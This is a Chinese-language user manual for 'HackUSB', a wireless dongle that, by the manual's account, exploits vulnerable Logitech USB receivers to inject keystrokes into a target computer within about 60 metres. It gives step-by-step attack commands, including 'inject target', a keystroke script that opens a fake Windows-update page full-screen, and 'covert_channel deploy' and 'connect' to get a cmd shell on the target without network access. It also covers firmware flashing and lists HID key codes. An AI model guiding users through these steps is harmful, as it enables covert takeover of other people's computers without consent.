HackUSB使用手册(v1.1)

Hackusb 远程控制一插即可,您只需将设备插入想控制的任意终端 usb 后, 您只要在控制端上插入发射器在 60 米(有效范围,更换天线可更远)内,即可进 行远程的键盘鼠标模拟,并且不用在同一网络而且目标机无网直接进入目标机的 cmdshell 内。

原作者 fusss badusb.pw
二次编辑 bingli

一、配置发射器环境

1.1、插入发射器

将你的April USB Dongle(发射器)插入电脑,也就是这个东西。

April USB Dongle
April USB Dongle

1.2、安装

等待安装好驱动。

1.3、设备管理器

  • 右键我的电脑->管理->设备管理器,找到端口。
    设备管理器
    设备管理器
  • 右键USB 串行设备(COM3)->属性

1.4、配置端口

在弹出的新窗口选择第二个端口设置

端口配置
端口配置

二、配置PuTTY

2.1、下载

如果你还没PuTTY的话,请自行通过搜索引擎搜索并下载。

2.2、配置终端

  • Serial
    COM[3] 这里的数字取决于你在设备管理器中看到的端口号。

Serial
Serial

  • Keyborad
    Keyborad
    Keyborad
  • Session
    Session
    Session
  • Save
    保存一下刚刚配置好的那些,下次就可以双击这个直接打开。

Save
Save

  • Open
    等有字出现,发射器和PuTTY配置也就完成了。

三、使用

3.1、使用前提

你已经将你的发射器以及罗技存在漏洞的USB接收器插入电脑。

3.2、设备匹配

  • 输入devices storage load XX:XX:XX:XX:XX注意:此处MAC地址为接收器的地址,另外可以按TAB键自动补全代码,或者命令写到load时候按tab补全MAC地址,一般来说要么是第一个要么是最后一个,下面那个也是同样的道理)。
  • 出现下面所示,说明就是加载成功了。
    discover
    discover
  • 输入inject target XX:XX:XX:XX:XX注意:这里的MAC地址应该是跟上面MAC地址相同)。

3.3、简单代码应用

  • script编辑一段脚本。
    script
    script
  • 具体原理就是用win + r,然后输入iexplore -k http://fakeupdate.net/wnc/,再按下F11,就达到以假乱真的效果。
  • script press GUI r 先按win+r,打开cmd。
  • script delay 500 设置500毫秒的延迟。
  • script string iexplore -k http://fakeupdate.net/wnc/ 输入。
  • script delay 500 再延迟500毫秒。
  • script press enter 按下回车。
  • script show 在检测一下代码是否如我们写的那一般。
    script-show
    script-show
  • 确认无误后用 inject execute 执行代码。
    inject-execute
    inject-execute
  • 出现上图所示的内容呢,就说明你已经成功执行了。

3.4、更新固件

  • 点击下载固件
  • 首先更新固件之前你得先连接上PuTTY,输入erase_flash,目的是为了刷新一下flash,以确保更新后能正常使用。
  • 拔下发射器,然后用卡针啊,很细很细之类的物体按发射器上有个小孔,插入电脑,这时候电脑就会加载一个新的盘符,这个就是发射器的bootloader内存空间,这时候就将我们之前下载好固件直接移至该盘符内,把更新文件拉进去后,会自动更新。
    小孔
    小孔
  • 更新完固件后,你就会发现最前面前缀变成了HackUSB。

四、一键进入电脑shell

4.1、covert_channel模块

  • covert_channel模块

4.2、运行脚本

  • covert_channel deploy XX:XX:XX:XX:XX 运行脚本(这里可能需要几分钟,如果不成功需要多执行几遍。或者关闭目标机的输入法)
  • 出现下图所示,就说明你成功注入了。
    成功注入
    成功注入
  • 输入covert_channel connnec XX:XX:XX:XX:XX进入控制,显示如下图所示就是成功进入电脑的shell了。
    shell
    shell
  • 如果需要退出,输入!exit

五、手机连接

请参考PDF文档。

六、命令介绍。

有待完善~。

七、键位

#define KEY_NULL 0x00 // null

#define KEY_A 0x04 // A 
#define KEY_B 0x05 // B 
#define KEY_C 0x06 // C 
#define KEY_D 0x07 // D 
#define KEY_E 0x08 // E
#define KEY_F 0x09 // F 
#define KEY_G 0x0A // G 
#define KEY_H 0x0B // H 
#define KEY_I 0x0C // I 
#define KEY_J 0x0D // J 
#define KEY_K 0x0E // K 
#define KEY_L 0x0F // L 
#define KEY_M 0x10 // M 
#define KEY_N 0x11 // N 
#define KEY_O 0x12 // O 
#define KEY_P 0x13 // P 
#define KEY_Q 0x14 // Q 
#define KEY_R 0x15 // R 
#define KEY_S 0x16 // S 
#define KEY_T 0x17 // T 
#define KEY_U 0x18 // U 
#define KEY_V 0x19 // V
#define KEY_W 0x1A // W 
#define KEY_X 0x1B // X 
#define KEY_Y 0x1C // Y 
#define KEY_Z 0x1D // Z
#define KEY_1 0x1E // 1 ! 
#define KEY_2 0x1F // 2 @ 
#define KEY_3 0x20 // 3 # 
#define KEY_4 0x21 // 4 $
#define KEY_5 0x22 // 5 %
#define KEY_6 0x23 // 6 ^
#define KEY_7 0x24 // 7 &
#define KEY_8 0x25 // 8 *
#define KEY_9 0x26 // 9 (
#define KEY_0 0x27 // 0 )

#define KEY_ENTER 0x28 // enter
#define KEY_ESC 0x29 // esc

#define KEY_BACKSPACE 0x2A // backspace
#define KEY_TAB 0x2B // tab
#define KEY_SPACE 0x2C // space

#define KEY_SUB 0x2D // - and _ 
#define KEY_EQUAL 0x2E // = and +
#define KEY_LEFT_BRACKET 0x2F // [ and { 
#define KEY_RIGHT_BRACKET 0x30 // ] and } 
#define KEY_VERTICAL_LINE 0x31 // \
#define KEY_WAVE 0x32 // ` and ~
#define KEY_SEMICOLON 0x33 // ; and : 
#define KEY_QUOTE 0x34 // ' and \
#define KEY_THROW 0x35 // ~ and ` 
#define KEY_COMMA 0x36 // , and < 
#define KEY_DOT 0x37 // . and >
#define KEY_QUESTION 0x38 // / and ? 
#define KEY_CAPS_LOCK 0x39 // caps Lock

#define KEY_F1 0x3A // f1
#define KEY_F2 0x3B // f2
#define KEY_F3 0x3C // f3
#define KEY_F4 0x3D // f4
#define KEY_F5 0x3E // f5
#define KEY_F6 0x3F // f6
#define KEY_F7 0x40 // f7
#define KEY_F8 0x41 // f8
#define KEY_F9 0x42 // f9
#define KEY_F10 0x43 // f10
#define KEY_F11 0x44 // f11
#define KEY_F12 0x45 // f12

#define KEY_PRT_SCR 0x46 // prtint screen
#define KEY_SCOLL_LOCK 0x47 // scoll Lock
#define KEY_PAUSE 0x48 // pause
#define KEY_INS 0x49 // insert
#define KEY_HOME 0x4A // home
#define KEY_PAGEUP 0x4B // pageup
#define KEY_DEL 0x4C // del
#define KEY_END 0x4D // end
#define KEY_PAGEDOWN 0x4E // pagedown

#define KEY_RIGHT_ARROW 0x4F // →
#define KEY_LEFT_ARROW 0x50 // ←
#define KEY_DOWN_ARROW 0x51 // ↓
#define KEY_UP_ARROW 0x52 // ↑

#define KEY_PAD_NUMLOCK 0x53

#define KEY_LCTRL 0xE0 // left ctrl 0x01 
#define KEY_LALT 0xE2 // left Alt 0x04 
#define KEY_LSHFIT 0xE1 // left Shift 0x02 
#define KEY_LWIN 0xE3 // left windows 0x08 
#define KEY_RWIN 0xE7 // right windows 0x80
#define KEY_RSHIFT 0xE5 // right Shift 0x20 

添加新评论

评论列表